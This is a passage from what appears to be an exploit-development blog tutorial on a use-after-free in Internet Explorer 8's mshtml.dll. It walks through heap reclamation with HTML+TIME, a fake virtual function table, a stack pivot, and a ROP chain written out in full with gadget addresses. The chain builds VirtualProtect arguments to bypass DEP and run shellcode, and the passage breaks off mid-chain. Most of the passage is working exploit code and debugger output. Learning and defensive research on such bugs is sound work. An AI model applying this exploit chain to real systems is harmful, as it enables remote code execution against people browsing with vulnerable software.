As we can see, we found the destructor! According to the previous stack trace, this destructor should make a call to HeapFree, which actually does the freeing. We can see that this is the case after disassembling the function in IDA.

Querying the Microsoft documentation for HeapFree, we can see it takes three arguments: 1. A handle to the heap where the chunk of memory will be freed, 2. Flags for freeing, and 3. A pointer to the actual chunk of memory to be freed.

At this point you may be wondering, “none of those parameters are the size”. That is correct! However, we now see that the address of the chunk that is going to be freed will be the third parameter passed to the HeapFree call. Note that since we are on a 32-bit system, functions arguments will be passed through the __stdcall calling convention, meaning the stack is used to pass the arguments to a function call.

Take one more look at the prototype of the previous image. Notice the destructor accepts an argument for an object of type CAnchorElement. This makes sense, as this is the destructor for an object instantiated from the CAnchorElement class. This also means, however, there must be a constructor that is capable of creating said object as well! And as the destructor invokes HeapFree, the constructor will most likely either invoke malloc or HeapAlloc! We know that the last argument for the HeapFree call in the destructor is the address of the actual chunk to be freed. This means that a chunk needs to be allocated in the first place. Searching again through the functions in IDA, there is a function located within the CAnchorElement class called CreateElement, which is very indicative of a CAnchorElement object constructor! Let’s take a look at this in IDA.

Great, we see that there is in fact a call to HeapAlloc. Let’s refer to the Microsoft documentation for this function.

The first parameter is again, a handle to an existing heap. The second, are any flags you would like to set on the heap allocation. The third, and most importantly for us, is the actual size of the heap. This tells us that when a CAnchorElement object is created, it will be 0x68 bytes in size. If we open up our POC again in Internet Explorer, letting the postmortem debugger taking over again, we can actually see the size of the free from the vulnerability is for a heap chunk that is 0x68 bytes in size, just as our reverse engineering of the CAnchorElement::CreateElement function showed!

#

This proves our hypothesis, and now we can start editing our script to see if we can’t control this allocation. Before proceeding, let’s disable PageHeap for IE8 now.

Now with that done, let’s update our POC with the following code.

The above POC starts out again with the trigger, to create the use-after-free condition. After the use-after-free is triggered, we are creating a string that has 104 bytes, which is 0x68 bytes - the size of the freed allocation. This by itself doesn’t result in any memory being allocated on the heap. However, as Corelan points out, it is possible to create an arbitrary DOM element and set one of the properties to the string. This action will actually result in the size of the string, when set to a property of a DOM element, being allocated on the heap!

Let’s run the new POC and see what result we get, leveraging WinDbg once again as a postmortem debugger.

Interesting! This time we are attempting to dereference the address 0x41414141, instead of getting an arbitrary crash like we did at the beginning of this blog, by triggering the original POC without PageHeap enabled! The reason for this crash, however, is much different! Recall that the heap chunk causing the issue is in ECX, just like we have previously seen. However, this time, instead of seeing freed memory, we can actually see our user-controlled data now allocates the heap chunk!

Now that we have finally figured out how we can control the data in the previously freed chunk, we can bring everything in this tutorial full circle. Let’s look at the current program execution.

We know that this is a routine to fetch a virtual function from a virtual function table. The first instruction, mov eax, dword ptr [ecx] takes the virtual function table pointer, also known as the vptr, and loads it into the EAX register. Then, from there, this vptr is dereferenced again, which points to the virtual function table, and is called at a specified offset. Notice how currently we control the ECX register, which is used to hold the vptr.

Let’s also take a look at this chunk in context of a HeapBase structure.

As we can see, in the heap our chunk is a part of, the LFH is activated (FrontEndHeapType of 0x2 means the LFH is in use). As mentioned earlier, this will allow us to easily fill in the freed memory with our own data, as we have just seen in the images above. Remember that the LFH is also LIFO, like the stack, on Windows 7. The last deallocated chunk is the first allocated chunk in the next request. This has proven useful, as we were able to find out the correct size for this allocation and service it.

This means that we own the 4 bytes that was previously used to hold the vptr. Let’s think now - what if it were possible to construct our own fake virtual function table, with 0x70 entries? What we could do is, with our primitive to control the vptr, we could replace the vptr with a pointer to our own “virtual function table”, which we could allocate somewhere in memory. From there, we could create 70 pointers (think of this as 70 “fake functions”) and then have the vptr we control point to the virtual function table.

By program design, the program execution would naturally dereference our fake virtual function table, it would fetch whatever is at our fake virtual function table at an offset of 0x70, and it would invoke it! The goal from here is to construct our own vftable and to make the 70th “function” in our table a pointer to a ROP chain that we have constructed in memory, which will then bypass DEP and give us a shell!

We know now that we can fill our freed allocation with our own data. Instead of just using DOM elements, we will actually be using a technique to perform precise reallocation with HTML+TIME, as described by Exodus Intelligence. I opted for this method to just simply avoid heap spraying, which is not the focus of this post. The focus here is to understand use-after-free vulnerabilities and understand JavaScript’s behavior. Note that on more modern systems, where a primitive such as this doesn’t exist anymore, this is what makes use-after-frees more difficult to exploit, the reallocation and reclaiming of freed memory. It may require additional reverse engineering to find objects that are a suitable size, etc.

Essentially what this HTML+TIME “method”, which only works for IE8, does is instead of just placing 0x68 bytes of memory to fill up our heap, which still results in a crash because we are not supplying pointers to anything, just raw data, we can actually create an array of 0x68 pointers that we control. This way, we can force the program execution to actually call something meaningful (like our fake virtual table!).

Take a look at our updated POC. (You may need to open the first image in a new tab)

Again, the Exodus blog will go into detail, but what essentially is happening here is we are able to leverage SMIL (Synchronized Multimedia Integration Language) to, instead of just creating 0x68 bytes of data to fill the heap, create 0x68 bytes worth of pointers, which is much more useful and will allow us to construct a fake virtual function table.

Note that heap spraying is something that is an alternative, although it is relatively scrutinized. The point of this exploit is to document use-after-free vulnerabilities and how to determine the size of a freed allocation and how to properly fill it. This specific technique is not applicable today, as well. However, this is the beginning of myself learning browser exploitation, and I would expect myself to start with the basics.

Let’s now run the POC again and see what happens.

Great news, we control the instruction pointer! Let’s examine how we got here. Recall that we are executing code within the same routine in CElement::Doc we have been, where we are fetching a virtual function from a vftable. Take a look at the image below.

Let’s start with the top. As we can see, EIP is now set to our user-controlled data. The value in ECX, as has been true throughout this routine, contains the address of the heap chunk that has been the culprit of the vulnerability. We have now controlled this freed chunk with our user-supplied 0x68 byte chunk.

As we know, this heap chunk in ECX, when dereferenced, contains the vptr, or in our case, the fake vptr. Notice how the first value in ECX, and every value after, is 004.... These are the array of pointers the HTML+TIME method returned! If we dereference the first member, it is a pointer to our fake vftable! This is great, as the value in ECX is dereferenced to fetch our fake vptr (one of the pointers from the HTML+TIME method). This then points to our fake virtual function table, and we have set the 70th member to 42424242 to prove control over the instruction pointer. Just to reiterate one more time, remember, the assembly for fetching a virtual function is as follows:

mov eax, dword ptr [ecx] 	 ; This gets the vptr into EAX, from the value pointed to by ECX
mov edx, dword ptr [eax+0x70]	 ; This takes the vptr, dereferences it to obtain a pointer to the virtual function table at an offset of 0x70, and stores it in EDX
call edx 			 ; The function is called

So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon seperated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090"; 					  // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";  				   // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

